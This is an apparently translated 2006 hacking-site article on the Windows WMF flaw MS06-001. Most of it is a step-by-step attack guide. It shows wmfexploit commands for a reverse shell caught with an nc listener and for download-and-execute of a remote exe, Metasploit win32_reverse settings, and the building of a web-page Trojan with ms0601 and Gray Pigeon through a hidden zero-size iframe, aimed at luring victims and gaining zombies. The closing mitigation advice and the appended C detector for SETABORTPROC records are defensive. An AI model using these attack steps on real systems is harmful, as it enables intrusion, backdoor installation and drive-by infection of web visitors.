myhack58 · 佚名 (Anonymous) · MYHACK58:6220068735
Apr 13, 2006 - 12:00 a.m.

Be careful! An overflow crisis caused by a picture: vulnerability warning (Black Bar Safety Net)

www.myhack58.com

Just as 2006 began, a serious vulnerability in the Windows System was disclosed: the Microsoft Windows Graphics Rendering Engine WMF format code-execution vulnerability, MS06-001. The flaw is in the way the graphics rendering engine plays back WMF (Windows Metafile) records. A hacker can construct a malicious WMF file and lure other users into opening it; on a system that has not installed the WMF patch, the hacker's pre-set malicious code runs with the privileges of the user who opened the file, and since that user is usually an administrator the system is completely surrendered to the hacker. Within a few days of the vulnerability being announced, viruses and attacks using the WMF vulnerability were spreading across the network, and to this day the Internet is still rife with countless uses of it. This article introduces the WMF vulnerability and the methods of preventing it.

Because the WMF vulnerability affects every Windows version from Windows 98 through Windows 2003, the harm is enormous. Attacks using the WMF vulnerability currently fall into two categories: 1. overflow attacks; 2. web-page Trojans built on the vulnerability. The former lets a hacker obtain the highest privileges on the system; the latter turns the victim's computer into the hacker's zombie ("broiler chicken", 肉鸡). Below we look at how hackers exploit the WMF vulnerability.

I. Using a dedicated overflow tool

An overflow tool for the WMF vulnerability appeared online within days of the announcement. Although it was published early and has some defects, it can still easily overflow a vulnerable host. The tool is named wmfexploit. After downloading it, extract it to the C: drive. Because it is an overflow program, antivirus software will treat it as a virus, so antivirus must be turned off during the test. Click "Start" → "Run", type "CMD" to open a command prompt, change to the C: drive and run wmfexploit with no arguments to see its usage. It has two overflow modes: 1. reverse connection; 2. active download-and-execute.

**1. Reverse overflow: penetrating the firewall**
The greatest benefit of a reverse overflow is that it penetrates the firewall: the connection is made from the victim outward, which most firewalls allow. At the same time, because the WMF vulnerability is triggered on the client side, we cannot use a vulnerability scanner to determine which hosts are vulnerable, so a reverse connection is used and whichever host turns out to be vulnerable connects back to our machine on its own.

Run wmfexploit in the command prompt to see the usage for a reverse overflow: wmfexploit 1 <local host> <local port> <con host> <con port>. The number 1 selects reverse-connection mode. <local host> <local port> are this machine's IP address and the port on which the program starts a small web service, so that the target can fetch the malicious WMF file from this machine and trigger the overflow. The final <con host> <con port> are the IP address and port on which we listen for the shell that the reverse overflow sends back. For example: wmfexploit 1 192.168.0.1 777 192.168.0.1 888. After pressing Enter the program reports that the bind succeeded.


Figure 1. Successfully set up the reverse connection

Once setup is complete, open another command prompt and run the network tool nc with nc -vv -l -p 888, so that nc listens on port 888 of this machine. Then lure the target into visiting our malicious WMF file by sending them the URL http://192.168.0.1:777/any.wmf. When the target opens that address, the WMF file bundled with the overflow data runs. Back in the nc window we can see that the target host has been overflowed and a shell has come back.

Figure 2. The overflow returns a shell

Tip: the IP address 192.168.0.1 above is a private LAN address, used only for convenient local testing. To test against a host on the public Internet, the machine's LAN IP and ports (777 and 888) must be mapped to a public IP, for example by port forwarding on the NAT router, and the public address given to the target.

**2. Download-and-execute: running a Trojan directly**
Besides the reverse overflow, wmfexploit has a second mode: download-and-execute. When the target host opens the malicious WMF file and the overflow occurs, no shell is sent back to a listening port on our machine; instead the victim downloads an exe file from a specified URL and runs it. This file can be a Trojan or any other program. We therefore also need web space on which to host the exe file to be executed.

The usage for a download-and-execute overflow is: wmfexploit 2 <local host> <local port> <url to download>. The number 2 selects download-and-execute mode, and the final <url to download> is the URL of the exe file. For example: wmfexploit 2 192.168.0.1 777 http://www.***.com/123.exe. After setup we do not need nc to listen; we simply send the URL http://192.168.0.1:777/any.wmf to the target.

II. Using a graphical overflow test system

Metasploit is a famous overflow test framework that covers almost every current overflow vulnerability; it can be described as an integration of all overflow programs. It is not simply a pile of overflow programs stacked together but provides a convenient, targeted overflow testing platform. Its biggest advantage for this test is a fully graphical (web) interface, which is very convenient for novices at overflow testing.

Download and install Metasploit. After installation, click "Start" and run "MSFUpdate" from the program group; a "Command Prompt" window pops up listing the files to be updated. Type "yes" and press Enter to update the overflow modules. When the update has finished, run "MSFWeb", which starts Metasploit's web service on this machine. Then open a browser and enter http://127.0.0.1:55555 in the address bar to reach the Metasploit interface. In the exploit list select "Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution" to open the vulnerability information page, then click the target "0 - Automatic - Windows XP / Windows 2003 / Windows Vista (default)" at the bottom. In the "Select Payload:" option that appears, choose "win32_reverse". Finally fill in the overflow information: only "HTTPHOST", "HTTPPORT", "LHOST" and "LPORT" need to be set (the address and port of the web service from which the target fetches the malicious WMF file, and the address and port that receive the reverse shell); leave the rest at their defaults. The setup method and principle are the same as for wmfexploit and are not repeated here.

Figure 3. Filling in the overflow information in Metasploit

As before, send the address of the malicious WMF file to the target. Once the target has overflowed, click "SESSIONS" in the Metasploit interface to obtain a shell with the victim's privileges, which on most systems means administrator.

Tip: Metasploit must be updated before use, otherwise the WMF vulnerability test option may not be present.

III. Exploiting the vulnerability to create web-page Trojans

The greatest impact of the WMF vulnerability has been the wave of web-page Trojans across the Internet. Because antivirus detection of image files is not strong enough, web-page Trojans built on the WMF vulnerability succeed very often, and they have become the leading kind of web Trojan recently. Below we look at the WMF web-page Trojan.

First prepare a Trojan. A reverse-connecting ("bounce") Trojan such as Gray Pigeon (灰鸽子) is recommended, so that after the target is overflowed the Trojan connects back to our host on its own, without us having to connect to it, which makes managing the zombies convenient. Then place the configured Trojan server on web space; free hosting can be applied for to store it.

Download the WMF Trojan generator ms0601. Run it from a command prompt; its usage is very simple: ms0601 [THE URL OF EXEFILE], i.e. give it the URL where the Trojan file is hosted. After pressing Enter it generates an exploit.wmf file in the same directory. Opening that WMF file triggers the overflow and automatically downloads and runs the Trojan from the web page.

Upload exploit.wmf to the web space. Finally, insert the following into the source code of the web page: <iframe src="URL of exploit.wmf" width=0 height=0></iframe>. When someone visits the page, no new browser window pops up; the zero-sized frame loads exploit.wmf directly and the overflow runs.

IV. Patching the vulnerability and preventing Trojans

Because the WMF vulnerability was disclosed only recently, many systems on the network have not yet been properly patched. Whether overflow or web Trojan, the success rate is very high, which also gives viruses and Trojans a propagation path. Having seen how hackers exploit the WMF vulnerability, let us look at how to patch it and prevent the WMF web-page Trojan.

1. Unregister the DLL file

Opening a malicious WMF file with the Windows Picture and Fax Viewer triggers the overflow, so if installing the system patch is inconvenient, a first step is to unregister the viewer's DLL, shimgvw.dll. Once it is unregistered the Windows Picture and Fax Viewer can no longer run, and this path to the overflow disappears. Note that this is only a workaround: the vulnerable code is in the graphics rendering engine itself (gdi32.dll), and any other application that plays back WMF files can still reach it, so the patch in section 2 is still required.

Method: click "Start" → "Run" and enter regsvr32 -u %windir%\system32\shimgvw.dll. To restore the Windows Picture and Fax Viewer, enter regsvr32 %windir%\system32\shimgvw.dll to re-register it.

Figure 4. Unregistering Shimgvw.dll

**2. Install the vulnerability patch**
Microsoft has released a patch for this vulnerability; it is available at http://www.microsoft.com/technet/security/Bulletin/MS06-001.mspx. This is the most thorough and also the most secure repair.

If installing Microsoft's system patch is inconvenient, a third-party patch program can be used instead.

**3. Be wary of unknown picture files**
If a malicious WMF file is placed on web space, accessing it behaves differently by system: on Win2000 a download prompt appears asking whether to download the WMF file, while WinXP and Win2003 pop up the Windows Picture and Fax Viewer but cannot display the picture content. When this happens, be careful: the WMF file may carry overflow data. Nor is it only files with the .wmf suffix that can trigger the overflow: Windows identifies the file by its content rather than its extension, so a constructed file named .jpg, .bmp or another image format overflows just the same. Be careful with pictures, therefore; hackers tend to give a malicious picture file a tempting name to lure others into opening it.

Figure 5. What opening a malicious WMF file looks like

In addition, updating antivirus software is a must; the latest antivirus software and virus databases already treat malicious WMF files as viruses.
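As an added example (not part of the original article and not code from any tool it mentions), the following C program applies the advice above mechanically: it walks the records of a WMF file by content, ignoring the file extension, and flags any META_ESCAPE record whose escape function is SETABORTPROC, the record type that MS06-001 abuses. The byte arrays are constructed for illustration: the "malicious" sample carries four filler bytes where an exploit would carry shellcode. The file name wmf_abortproc_scan.c and the function names are my own.

```c
/* wmf_abortproc_scan.c - added example, not from the original article.
 * Walks the records of a WMF file in memory and flags META_ESCAPE records
 * whose escape function is SETABORTPROC (the record abused by MS06-001).
 * The check is by content, so a renamed .jpg/.bmp is caught as well.
 * Build: cc -Wall -o wmf_abortproc_scan wmf_abortproc_scan.c
 * Usage: ./wmf_abortproc_scan <file>
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define WMF_PLACEABLE_KEY 0x9AC6CDD7u  /* Aldus placeable header magic */
#define META_ESCAPE       0x0626
#define META_EOF          0x0000
#define ESC_SETABORTPROC  0x0009

enum wmf_verdict {
    WMF_NOT_WMF = 0,      /* no recognisable WMF header */
    WMF_CLEAN = 1,        /* walked to META_EOF without a SETABORTPROC escape */
    WMF_SETABORTPROC = 2, /* SETABORTPROC escape record present */
    WMF_MALFORMED = 3     /* record walk ran off the buffer or hit a short record */
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }

/* Offset of the 18-byte METAHEADER, or -1 if the buffer is not a WMF. */
static long wmf_header_offset(const uint8_t *buf, size_t len)
{
    size_t off = 0;
    if (len >= 22 && rd32(buf) == WMF_PLACEABLE_KEY)
        off = 22;                              /* skip the 22-byte placeable header */
    if (len < off + 18)
        return -1;
    uint16_t type = rd16(buf + off);           /* 1 = memory metafile, 2 = disk */
    uint16_t hdr_words = rd16(buf + off + 2);  /* header size in WORDs, always 9 */
    if ((type != 1 && type != 2) || hdr_words != 9)
        return -1;
    return (long)off;
}

/* Scan buf; on a hit, *hit_off (if non-NULL) receives the offending record's offset. */
enum wmf_verdict wmf_scan(const uint8_t *buf, size_t len, size_t *hit_off)
{
    long hdr = wmf_header_offset(buf, len);
    if (hdr < 0)
        return WMF_NOT_WMF;
    size_t off = (size_t)hdr + 18;             /* first record follows the header */
    while (off + 6 <= len) {                   /* Size (DWORD) + Function (WORD) */
        uint32_t size_words = rd32(buf + off); /* record length in WORDs, incl. these 6 bytes */
        uint16_t func = rd16(buf + off + 4);
        /* A record is at least 3 WORDs; compare in WORDs so a huge size cannot overflow. */
        if (size_words < 3 || size_words > (len - off) / 2)
            return WMF_MALFORMED;
        size_t rec_bytes = (size_t)size_words * 2;
        if (func == META_EOF)
            return WMF_CLEAN;
        /* Escape record layout: Function, EscapeFunction (WORD), ByteCount (WORD), data. */
        if (func == META_ESCAPE && rec_bytes >= 10 &&
            rd16(buf + off + 6) == ESC_SETABORTPROC) {
            if (hit_off)
                *hit_off = off;
            return WMF_SETABORTPROC;
        }
        off += rec_bytes;
    }
    return WMF_MALFORMED;                      /* data ended before META_EOF */
}

/* Convenience wrapper: offset of the SETABORTPROC record, or (size_t)-1 if none. */
size_t wmf_hit_offset(const uint8_t *buf, size_t len)
{
    size_t off = 0;
    return wmf_scan(buf, len, &off) == WMF_SETABORTPROC ? off : (size_t)-1;
}

/* Constructed samples for illustration (not real exploit files). */
const uint8_t SAMPLE_CLEAN[] = {               /* METAHEADER + META_EOF only */
    0x01,0x00, 0x09,0x00, 0x00,0x03, 0x0C,0x00,0x00,0x00, 0x00,0x00,
    0x03,0x00,0x00,0x00, 0x00,0x00,
    0x03,0x00,0x00,0x00, 0x00,0x00             /* META_EOF, 3 WORDs */
};
const uint8_t SAMPLE_SETABORTPROC[] = {
    0xD7,0xCD,0xC6,0x9A, 0x00,0x00, 0x00,0x00,0x00,0x00,0x64,0x00,0x64,0x00,
    0x60,0x00, 0x00,0x00,0x00,0x00, 0x71,0x57, /* placeable header, 22 bytes */
    0x01,0x00, 0x09,0x00, 0x00,0x03, 0x13,0x00,0x00,0x00, 0x00,0x00,
    0x07,0x00,0x00,0x00, 0x00,0x00,            /* METAHEADER, 18 bytes */
    0x07,0x00,0x00,0x00, 0x26,0x06, 0x09,0x00, 0x04,0x00,
    0x41,0x41,0x41,0x41,                       /* META_ESCAPE SETABORTPROC + filler data */
    0x03,0x00,0x00,0x00, 0x00,0x00             /* META_EOF */
};
const uint8_t SAMPLE_JPEG[] = {                /* JFIF magic: not a metafile at all */
    0xFF,0xD8,0xFF,0xE0, 0x00,0x10, 0x4A,0x46,0x49,0x46,0x00, 0x01,0x01,
    0x00, 0x00,0x48, 0x00,0x48, 0x00,0x00
};

int main(int argc, char **argv)
{
    static const char *names[] = { "not a WMF", "clean", "SETABORTPROC escape found", "malformed" };
    if (argc != 2) { fprintf(stderr, "usage: %s <file>\n", argv[0]); return 2; }
    FILE *f = fopen(argv[1], "rb");
    if (!f) { perror(argv[1]); return 2; }
    uint8_t *buf = NULL; size_t len = 0, cap = 0, n;
    do {                                       /* slurp the whole file into memory */
        if (len == cap) { cap = cap ? cap * 2 : 65536; buf = realloc(buf, cap); if (!buf) return 2; }
        n = fread(buf + len, 1, cap - len, f);
        len += n;
    } while (n > 0);
    fclose(f);
    size_t hit = 0;
    enum wmf_verdict v = wmf_scan(buf, len, &hit);
    printf("%s: %s", argv[1], names[v]);
    if (v == WMF_SETABORTPROC) printf(" at byte offset %zu", hit);
    printf("\n");
    free(buf);
    return v == WMF_SETABORTPROC ? 1 : 0;
}
```

Walking the records, rather than grepping for the byte pattern 26 06 09 00 as a simple signature would, avoids false hits on the same bytes occurring inside pixel or string data. A legitimate metafile has no reason to carry a SETABORTPROC escape, so a hit is a strong signal; a "malformed" verdict is also worth treating as suspicious, since the known exploit files rely on playback failing after the escape record so that the abort procedure is invoked.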